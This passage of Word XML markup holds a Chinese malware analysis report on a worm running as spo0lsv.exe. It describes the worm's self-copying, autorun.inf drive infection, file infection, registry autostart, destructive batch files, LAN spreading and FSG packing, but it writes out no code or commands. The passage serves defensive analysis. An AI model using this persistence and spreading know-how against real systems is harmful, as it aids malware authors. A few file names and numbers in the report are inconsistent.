        </w:rPr>
        <w:t>文件由于创建这些文件之后就对注册表的SHOWALL项进行了设置，使得隐藏文件无法显示，那么有理由相信，所创建出来的这些文件的属性都是“隐藏”的，于是有：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52D777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512E7">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>病毒行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D512E7">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6：将自身拷贝到根目录，并命名为“setup.exe”，同时创建“autorun.inf”用于病毒的启动，这两个文件的属性都是“隐藏”。          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B20D575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512E7">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>病毒行为7：在一些目录中创建名为“Desktop_.ini”的隐藏文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A9D2A1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512E7">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>病毒行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D512E7">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>创建.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>批处理程序破坏电脑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F023E55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</w:p>
    <w:p w14:paraId="241E2689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rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4 对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>po0lsv.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的监控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B91F93" w14:textId="77777777" w:rsid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7CDE0C" wp14:editId="085F369F">
            <wp:extent cx="5278120" cy="19710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2105" w14:textId="77777777" w:rsidR="00D512E7" w:rsidRPr="00D512E7" w:rsidRDefault="00D512E7" w:rsidP="00C11F66">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D512E7">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>病毒行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D512E7">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>连接局域网向外发包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE895C2" w14:textId="77777777" w:rsidR="002F77BE" w:rsidRDefault="009A2DBF" w:rsidP="009A2DBF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc3126938"/>
      <w:r w:rsidRPr="009A2DBF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2DB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F77BE" w:rsidRPr="009A2DB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恶意程序对用户造成的危害(图)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidR="002F77BE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14:paraId="51C5FE41" w14:textId="77777777" w:rsidR="00AE7A21" w:rsidRDefault="00AE7A21" w:rsidP="00AE7A21">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7A21">
        <w:t>1.病毒复制自身到系统目录</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE7A21">
        <w:t>下名字</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE7A21">
        <w:t>为spcolsv.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B7E818" w14:textId="77777777" w:rsidR="00E058B7" w:rsidRDefault="00E058B7" w:rsidP="00AE7A21">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47BF3772" wp14:editId="0DBEE769">
            <wp:extent cx="5278120" cy="276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A73" w14:textId="77777777" w:rsidR="00AE7A21" w:rsidRDefault="00AE7A21" w:rsidP="00AE7A21">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7A21">
        <w:t>2.每个目录下生成Desktop_.ini（记录日期）文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584ACD6D" w14:textId="77777777" w:rsidR="00E058B7" w:rsidRDefault="00E058B7" w:rsidP="00AE7A21">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FC05632" wp14:editId="40B7BF10">
            <wp:extent cx="5278120" cy="277241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BA9" w14:textId="77777777" w:rsidR="00AE7A21" w:rsidRDefault="00AE7A21" w:rsidP="00AE7A21">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7A21">
        <w:t>3.感染全盘二进制文件与脚本文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49413CCC" w14:textId="77777777" w:rsidR="00E058B7" w:rsidRDefault="00E058B7" w:rsidP="00AE7A21">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6429AF3D" wp14:editId="2E349C9D">
            <wp:extent cx="5278120" cy="23641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61C" w14:textId="77777777" w:rsidR="00AE7A21" w:rsidRDefault="00AE7A21" w:rsidP="00AE7A21">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7A21">
        <w:t>4.将病毒</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE7A21">
        <w:t>Svcshare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE7A21">
        <w:t>设置开机自启动Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C7E81" w14:textId="77777777" w:rsidR="00E058B7" w:rsidRDefault="00E058B7" w:rsidP="00AE7A21">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33690AA1" wp14:editId="5FC982ED">
            <wp:extent cx="5278120" cy="295783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0F01" w14:textId="77777777" w:rsidR="002F77BE" w:rsidRDefault="00AE7A21" w:rsidP="00AE7A21">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7A21">
        <w:t>5.盘符根目录下生成setup.exe与autorun.inf文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246261AC" w14:textId="77777777" w:rsidR="00AE7A21" w:rsidRDefault="00E058B7" w:rsidP="00AE7A21">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50B0A007" wp14:editId="22F815E5">
            <wp:extent cx="5278120" cy="2696210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1D3" w14:textId="77777777" w:rsidR="00AE7A21" w:rsidRPr="00AE7A21" w:rsidRDefault="00AE7A21" w:rsidP="00AE7A21"/>
    <w:p w14:paraId="419D9A49" w14:textId="77777777" w:rsidR="009A2DBF" w:rsidRDefault="009A2DBF" w:rsidP="009A2DBF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc3126939"/>
      <w:r w:rsidRPr="009A2DBF"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.2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9A2DBF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>恶意代码分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5634CC3E" w14:textId="77777777" w:rsidR="002F77BE" w:rsidRDefault="002F77BE" w:rsidP="009A2DBF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto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bookmarkStart w:id="10" w:name="_Toc3126940"/>
      <w:r w:rsidRPr="009A2DBF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.1 加固后的恶意代码树结构图</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2DB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(是否有加固)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="428C4BAD" w14:textId="77777777" w:rsidR="00AE7A21" w:rsidRPr="00AE7A21" w:rsidRDefault="00AE7A21" w:rsidP="00AE7A21">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>EiD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查壳</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发现有F</w:t>
      </w:r>
      <w:r>
        <w:t>SG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>壳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B400DEE" w14:textId="77777777" w:rsidR="002F77BE" w:rsidRPr="00966F61" w:rsidRDefault="002F77BE" w:rsidP="002F77BE">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A2DBF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="00AE7A21">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="226CB481" wp14:editId="3F558930">
            <wp:extent cx="4190476" cy="24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463" w14:textId="77777777" w:rsidR="002F77BE" w:rsidRDefault="009A2DBF" w:rsidP="009A2DBF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto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bookmarkStart w:id="11" w:name="_Toc3126941"/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.2</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2DBF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="002F77BE" w:rsidRPr="009A2DBF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恶意程序的代码分析片段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="0FDD740A" w14:textId="77777777" w:rsidR="007F1828" w:rsidRDefault="00A256A8" w:rsidP="007F1828"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 xml:space="preserve">病毒主逻辑 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB94E58" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F7CC57C" wp14:editId="00B11818">
            <wp:extent cx="5278120" cy="2969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4DFB" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重点在我红框框起来的三个c</w:t>
      </w:r>
      <w:r>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面开始详解每一个c</w:t>
      </w:r>
      <w:r>
        <w:t>all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455F38A7" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个c</w:t>
      </w:r>
      <w:r>
        <w:t>all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710D276C" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分为三条分支 不同情况下会执行不同的流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AE4263" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.2.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分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8359606" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发条件:正在运行的病毒路径和系统目录下的不一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC937A7" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24F5EF5E" wp14:editId="09ECA7CB">
            <wp:extent cx="5278120" cy="22332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C27B" w14:textId="77777777" w:rsidR="007F1828" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支一行为：自我复制到系统目录下运行系统目录下的病毒程序 然后结束掉本进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F9C718" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.2.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支二：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5657B876" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRPr="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发条件:正在运行的病毒路径和系统目录下的一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C7169" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56EDD007" wp14:editId="7C52845A">
            <wp:extent cx="5278120" cy="422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496" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="007F1828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支二行为：不结束本进程 继续执行病毒主流程 只有通过分支二才能继续往下分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229359AF" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="00A256A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.2.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支三：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E4443A" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="00A256A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发条件:运行被感染文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151A1AA6" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="00A256A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04AC771F" wp14:editId="67628EA4">
            <wp:extent cx="5278120" cy="2861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0E9" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00A256A8" w:rsidP="00A256A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒行为：1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">恢复文件 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行批处理脚本文件 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保系统目录下的病毒进程正在运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798C3BC" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRPr="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00A256A8"/>
    <w:p w14:paraId="4A99DC03" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00816DC9" w:rsidP="00A256A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.2.2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个关键函数总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9A3B55" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00A256A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B071420" wp14:editId="699BF4B3">
            <wp:extent cx="5278120" cy="14211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CFFF" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个c</w:t>
      </w:r>
      <w:r>
        <w:t>all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3652323E" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00A256A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.2.3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个关键函数主逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5E4EBE" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00A256A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F077881" wp14:editId="7CA6C1E7">
            <wp:extent cx="4838095" cy="19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76CF" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRPr="00A256A8" w:rsidRDefault="00816DC9" w:rsidP="00A256A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个关键函数分为三条分支</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097DCE5A" w14:textId="77777777" w:rsidR="00A256A8" w:rsidRDefault="00816DC9" w:rsidP="00816DC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创建线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A61FC6E" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC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设置定时器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1DE878" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC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局域网感染</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026C1BA3" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC9"/>
    <w:p w14:paraId="086D001B" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.2.3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面详解每一个分支</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9AEA7" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程回调函数</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>详解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009E18E6" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2469C157" wp14:editId="082AFB5A">
            <wp:extent cx="5278120" cy="3032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EABF" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>函数用了一个死循环 一直在扫描所有可用磁盘 最后一个函数是</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程回调函数</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的核心感染文件部分 下面详解这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18938E43" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC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跳过系统敏感文件 不予感染</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC55C5B" w14:textId="77777777" w:rsidR="00816DC9" w:rsidRDefault="00816DC9" w:rsidP="00816DC9">
      <w:r>
        <w:rPr>
